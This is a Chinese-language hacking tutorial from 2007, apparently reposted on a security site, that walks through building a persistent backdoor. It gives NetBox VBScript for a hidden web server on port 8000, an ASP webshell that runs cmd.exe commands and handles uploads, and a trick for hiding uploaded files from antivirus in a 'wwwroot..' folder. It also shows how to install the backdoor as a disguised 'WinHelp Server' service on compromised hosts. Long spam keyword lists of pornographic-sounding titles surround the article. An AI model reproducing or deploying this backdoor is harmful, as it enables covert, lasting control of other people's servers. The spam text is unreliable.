国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

黑客技巧 輕松擁有自己的超級(jí)Http后門
2007-01-26   

以前寫的一篇文章,現(xiàn)在公布出來(lái),對(duì)編程感興趣歡迎和我討論呵!

一、前言

在當(dāng)今微軟當(dāng)?shù)赖哪甏胰怆u已經(jīng)不是什么難事,各種各樣的傻瓜工具大大方便了菜鳥們的入侵,但是往往入侵成功了,怎么去做好后門,把肉雞盡可能久的抓住往往困惑著像我一樣的菜鳥們。用過(guò)無(wú)數(shù)網(wǎng)上經(jīng)典的后門后,在丟失了許多辛辛苦苦弄到的肉雞后,我下定決心要寫自己的后門。于是有了下面的文章。

二、Netbox簡(jiǎn)介

一個(gè)偶然的機(jī)會(huì),我認(rèn)識(shí)了Netbox。Netbox是一個(gè)使用腳本語(yǔ)言進(jìn)行應(yīng)用軟件開發(fā)與發(fā)布的開發(fā)環(huán)境和運(yùn)行平臺(tái),使用 NetBox,可以完全使用腳本語(yǔ)言(比如 VBScript,Javascript) 創(chuàng)建出穩(wěn)定高效的應(yīng)用軟件,并且可以平滑移植到從 Windows 98 到 Windows .NET Server 的全部操作系統(tǒng)上。

它可以方便的將asp應(yīng)用編譯成為獨(dú)立運(yùn)行的執(zhí)行程序,完全擺脫iis的束縛(將iis卸載后程序運(yùn)行仍然正常),在幾乎所有的Windows版本上面直接運(yùn)行,完全不需要考慮平臺(tái)兼容性和對(duì)asp運(yùn)行環(huán)境的要求。同時(shí)NetBox還提供大量擴(kuò)展部件,使得WEB應(yīng)用更加方便。說(shuō)了那么多,大家肯定很想見識(shí)見識(shí)這位帥哥吧,好。

三、一起動(dòng)手

如果大家已經(jīng)對(duì)腳本語(yǔ)言VBScript或者Javascript有一點(diǎn)了解,那就可以跟我動(dòng)手了。我們的任務(wù)是在建立一個(gè)與iis完全無(wú)關(guān)的web服務(wù)器,它可以為我們提供FSO的支持,以方便上傳文件。并支持腳本宿主WSH,這樣我們就能執(zhí)行命令了。在網(wǎng)站根目錄里我們可以放上自己的asp木馬或其它的木馬后門并可以隨時(shí)執(zhí)行。

首先需要建立我們的web服務(wù)器,這個(gè)服務(wù)器和IIS沒有任何關(guān)系,即使卸載了IIS它也可以運(yùn)行。利用NetBox的HttpServer對(duì)象就能輕易的辦到。

在記事本里寫入如下幾行代碼:

Set httpd = CreateObject("NetBox.HttpServer")
*創(chuàng)建httpserver對(duì)象
If httpd.Create("", 8000) = 0 Then
*web服務(wù)端口設(shè)為8000,可以自己改,不要和其他端口沖突就行了。
Set host = httpd.AddHost("", "\wwwroot")
*設(shè)置web服務(wù)的根目錄為文件夾"wwwroot"。
host.EnableScript = true
*使Web服務(wù)器能夠理解服務(wù)器端腳本程序,既支持asp。
host.AddDefault "default.asp"
host.AddDefault "default.htm"
host.AddDefault "index.asp"
host.AddDefault "index.htm"
host.AddDefault "default.html"
host.AddDefault "index.html"
*設(shè)置缺省文件,相當(dāng)與iis中的默認(rèn)文檔。
httpd.Start
*開始服務(wù)
else
httpd.Stop
Shell.Quit 0
End If
End Sub

將文件存為main.box。

這樣一個(gè)支持asp的服務(wù)器源代碼就寫成功了,它可以讓你的asp木馬隨心所欲的運(yùn)行,而且不用擔(dān)心會(huì)有日志記錄,但是現(xiàn)在它還遠(yuǎn)不是一個(gè)后門,只是提供了與IIS相當(dāng)?shù)墓δ埽瑸榱朔乐购箝T被殺,我們不妨自己來(lái)寫一個(gè)簡(jiǎn)單的CMD.ASP,當(dāng)然不是那個(gè)所謂的最簡(jiǎn)短的asp后門了。我們要實(shí)現(xiàn)的功能是可以上傳文件和執(zhí)行命令。

這里只分析主要的代碼,詳細(xì)的代碼附在了軟件包里。

set pyeWSH=server.createobject("WSCRIPT.SHELL")
*建立shell(wshshell)對(duì)象pyeWSH
set pyeFSO=server.createobject("scripting.filesystemobject")
*建立文件系統(tǒng)對(duì)象pyeFSO用于文件方面的操作
szTempFile="C:\"& pyeFSO.GetTempName()
*GetTempName()是fso建立臨時(shí)文件的一種方法
Call pyeWSH.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)
*調(diào)用wshshell的run方法來(lái)執(zhí)行命令,并把結(jié)果重定向到臨時(shí)文件中
set oFile=pyeFSO.OpenTextFile(szTempFile,1,False,0)
*以讀的方式打開臨時(shí)文件

思路應(yīng)該很清楚,我簡(jiǎn)單說(shuō)說(shuō)。建立shell對(duì)象是用于執(zhí)行命令,建立文件系統(tǒng)對(duì)象是用于將命令執(zhí)行的結(jié)果輸入到一個(gè)臨時(shí)文件中并將文件內(nèi)容讀出來(lái)。要看到命令執(zhí)行的結(jié)果只要加上這樣一句:

response.write server.HTMLEncode(oFile.ReadAll)

就能讀出臨時(shí)文件的內(nèi)容并顯示出來(lái)。實(shí)現(xiàn)上傳文件功能的代碼也很簡(jiǎn)單。

注意這里是將上傳的文件保存到了肉雞上的一個(gè)“wwwroot.”的文件夾下面,這個(gè)文件夾只能在CMD下面用mkdir wwwroot..\ 建立。放在這個(gè)文件夾里的文件在一般情況下是看不到的,所以可以在一定程度上躲過(guò)殺毒軟件的查殺,不過(guò)執(zhí)行的時(shí)候也要麻煩一點(diǎn)了,因?yàn)榉旁谶@里面的程序用shell對(duì)象的run方法運(yùn)行不了的,因?yàn)楦菊也坏竭@個(gè)要執(zhí)行的文件。但奇怪的是可以將里面的文件copy到別的地方,所以需要執(zhí)行時(shí)就是先要將文件copy到其它目錄下,當(dāng)然啦這么簡(jiǎn)單的事我們的后門完全可以做到。Asp后門就這樣做好了,很簡(jiǎn)單吧?而且功能也不差,如果你夠懶的話,也可以直接用別人的Asp后門。

然后我們將Web服務(wù)器做成一個(gè)真正的服務(wù),也就是可以隨系統(tǒng)一起啟動(dòng),只需要加上這樣一句:

Shell.Service.RunService "WinHelp Server","WinHelp Server","Windows Help service "

引號(hào)內(nèi)依次為服務(wù)名,服務(wù)顯示名,服務(wù)描述字符串,可以發(fā)揮想象自己改。

安裝服務(wù)的命令是:myapp -install,要注意的是這個(gè)命令只是將程序變成服務(wù),并沒有運(yùn)行,所以要馬上生效的話,就要輸入myapp.exe以執(zhí)行它。

卸載服務(wù)的命令是:myapp -remove,myapp表示文件的名稱。

四、編譯應(yīng)用程序

沒想到還有這一步吧?像一般的編譯程序一樣,源文件要變異了才能執(zhí)行,編譯需要使用工具Nbdw.exe,這個(gè)工具用于將NetBox 應(yīng)用發(fā)布成為獨(dú)立的應(yīng)用程序。

點(diǎn)擊選擇源文件夾,找到我們存放源文件的目錄,勾選要編譯的文件,在輸出文件里填上要生成的執(zhí)行文件名,如pyedoor.exe,點(diǎn) Build...,開始編譯。

最后,我們得到了編譯成功的那個(gè)可執(zhí)行文件,使用時(shí)需要上傳到遠(yuǎn)程主機(jī)上,執(zhí)行pyedoor -install,就將后門以服務(wù)方式運(yùn)行了,訪問(wèn)時(shí)只需在瀏覽器里輸入www.target.com:8000/cmd.asp就可以看到我們的木馬了。

相信熟悉網(wǎng)頁(yè)木馬的高手們不用我羅嗦了吧?但是要注意的是這個(gè)網(wǎng)頁(yè)木馬是將上傳的文件放在“wwwroot..\”目錄下的,即使在command框里輸入dir wwwroot..\也看不到上傳的文件,也執(zhí)行不了,目的在于防止被殺。那萬(wàn)一需要執(zhí)行該怎么辦呢?聰明的你肯定想到了吧,對(duì)了,只要copy“wwroot..\”目錄下的文件到別的文件夾下就行了。怎么樣很簡(jiǎn)單吧?原來(lái)?yè)碛凶约旱暮箝T這么容易。

為了方便大家使用我把做好的后門,做成了自解壓文件,里面有必需的源文件,還有一個(gè)配合后門的批處理。使用時(shí)只需把這個(gè)自解壓文件上傳到遠(yuǎn)程主機(jī)上執(zhí)行就可以了。

五、自我總結(jié)

Netbox是一個(gè)新工具,本來(lái)不是為黑客服務(wù)的,但我們可以拿來(lái),它還有很多值得開發(fā)的功能,很希望和大家一起研究。另外就是不要覺得編程之類的很復(fù)雜,只要有信心沒有辦不成的事。


熱詞搜索:

上一篇:防范拒絕服務(wù)攻擊妙招兒
下一篇:ASP網(wǎng)站漏洞解析及黑客入侵防范方法

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产欧美一区二区三区在线看蜜臀 | 精品亚洲国产成人av制服丝袜| 精品1区2区在线观看| 色88888久久久久久影院按摩| 亚洲亚洲精品在线观看| 国产视频一区在线播放| 欧美日韩亚洲国产综合| 欧美精品色一区二区三区| 国产精品一区在线| 日韩av在线播放中文字幕| 亚洲欧美日韩国产中文在线| 精品国产精品网麻豆系列| 欧美日韩一区 二区 三区 久久精品| 成人午夜视频在线| 99久久精品国产一区二区三区| 成人h动漫精品一区二| 不卡欧美aaaaa| 91精彩视频在线观看| 欧美中文字幕一二三区视频| 91精品福利在线一区二区三区| 欧美精品久久久久久久久老牛影院 | 日韩专区中文字幕一区二区| 亚洲二区视频在线| 日本欧美韩国一区三区| 久久精品国产精品亚洲精品| 久久99国产精品麻豆| 国产激情91久久精品导航 | 另类欧美日韩国产在线| 国产自产高清不卡| 99久久免费视频.com| 精品视频一区三区九区| 日韩视频中午一区| 欧美激情中文字幕一区二区| 夜夜嗨av一区二区三区网页| 亚洲丰满少妇videoshd| 国产成人自拍高清视频在线免费播放| 91性感美女视频| 日韩视频一区二区三区在线播放| 国产人久久人人人人爽| 亚洲国产欧美在线人成| 国产乱妇无码大片在线观看| 91丝袜国产在线播放| 欧美一区二区三区公司| 中文在线一区二区| 日韩av中文在线观看| 91在线视频18| 久久久国际精品| 免费看精品久久片| 欧美性受极品xxxx喷水| 国产精品素人一区二区| 蜜桃视频在线观看一区二区| 91美女视频网站| 中文字幕高清一区| 国产美女一区二区| 精品国一区二区三区| 亚洲va欧美va人人爽| 一本在线高清不卡dvd| 国产精品大尺度| 丁香一区二区三区| 国产欧美日韩综合| 国产一本一道久久香蕉| 日韩欧美不卡一区| 精品亚洲porn| 精品福利在线导航| 国产永久精品大片wwwapp| 精品国产免费视频| 国产精品77777竹菊影视小说| 欧美成人video| 另类欧美日韩国产在线| 欧美sm美女调教| 国产一区在线不卡| 国产婷婷色一区二区三区四区| 国产在线一区观看| 中文字幕制服丝袜成人av | 国产精品国产精品国产专区不片| 国产成+人+日韩+欧美+亚洲| 亚洲欧洲成人精品av97| 在线精品视频免费观看| 夜夜嗨av一区二区三区四季av| 三级精品在线观看| 亚洲午夜在线观看视频在线| 欧美午夜精品久久久久久孕妇| 一区二区在线观看视频| 欧美日韩电影在线| 国产一区二区电影| 一色桃子久久精品亚洲| 欧美天堂一区二区三区| 国产一区91精品张津瑜| 亚洲精选在线视频| 欧美一卡二卡三卡| 成人性生交大片| 午夜在线成人av| 国产日本欧美一区二区| 欧美日韩一区二区三区在线| 久草热8精品视频在线观看| 一区二区三区影院| 久久久一区二区三区| www.欧美日韩国产在线| 韩日av一区二区| 五月天中文字幕一区二区| 国产精品伦一区| 欧美精品一区二区三区久久久| 在线亚洲一区二区| 国产成+人+日韩+欧美+亚洲 | 精品久久久久久亚洲综合网| 在线视频亚洲一区| av中文一区二区三区| 国产自产高清不卡| 久久精品国产第一区二区三区| 亚洲超丰满肉感bbw| 亚洲人一二三区| √…a在线天堂一区| 国产精品另类一区| 欧美国产日韩精品免费观看| xnxx国产精品| 精品国产乱码久久久久久夜甘婷婷| 9191精品国产综合久久久久久 | 色悠久久久久综合欧美99| 成人美女视频在线看| 国产999精品久久久久久绿帽| 精品一区二区三区的国产在线播放| 成人h动漫精品一区二区 | 日本一区二区三区国色天香| 国产视频911| 中文字幕中文乱码欧美一区二区| 亚洲女人的天堂| 亚洲综合一区在线| 亚洲一区二区三区小说| 日本美女一区二区三区视频| 青青国产91久久久久久| 加勒比av一区二区| 成人午夜av在线| 欧美日韩中文精品| 欧美大片国产精品| 国产精品久久影院| 亚洲精品国产a| 美女一区二区久久| 91在线国内视频| 欧美丰满一区二区免费视频| 精品久久久久99| 日韩理论片在线| 久久国产生活片100| 色婷婷激情综合| 精品国产伦一区二区三区观看体验| 国产欧美日韩视频在线观看| 一区二区国产盗摄色噜噜| 国产精品资源在线看| 欧洲一区在线观看| 国产色一区二区| 免费人成精品欧美精品| 99re热视频这里只精品| 欧美一区二区福利视频| 日韩理论片一区二区| 国产高清不卡二三区| 欧美一区二区三区啪啪| 亚洲精选视频免费看| 成人午夜av在线| 久久久久久久久岛国免费| 日韩专区中文字幕一区二区| 欧美日韩在线直播| 18成人在线观看| 国产91对白在线观看九色| 久久综合色天天久久综合图片| 亚洲电影一级黄| 欧美性生交片4| 亚洲精品久久嫩草网站秘色| 盗摄精品av一区二区三区| 日韩一区二区三| 热久久一区二区| 精品国产在天天线2019| 经典三级视频一区| 精品粉嫩aⅴ一区二区三区四区| 日韩av成人高清| 久久在线观看免费| 国产成人精品一区二区三区四区| 久久久久国产精品麻豆ai换脸 | 九色综合国产一区二区三区| 精品精品国产高清a毛片牛牛| 精品亚洲国内自在自线福利| 国产亚洲欧洲一区高清在线观看| 国产成人午夜99999| 亚洲精品第一国产综合野| 欧美日韩精品一区二区三区四区| 日韩主播视频在线| 精品国产伦一区二区三区免费 | 久久精品一级爱片| 国产剧情一区在线| 亚洲欧洲日产国产综合网| 91久久人澡人人添人人爽欧美| 美腿丝袜一区二区三区| 国产精品色婷婷久久58| 精品视频资源站| 国产成人精品综合在线观看| 性欧美疯狂xxxxbbbb| 国产三区在线成人av| 在线免费观看日韩欧美| 黄一区二区三区| 亚洲宅男天堂在线观看无病毒| 日韩精品综合一本久道在线视频| 94-欧美-setu|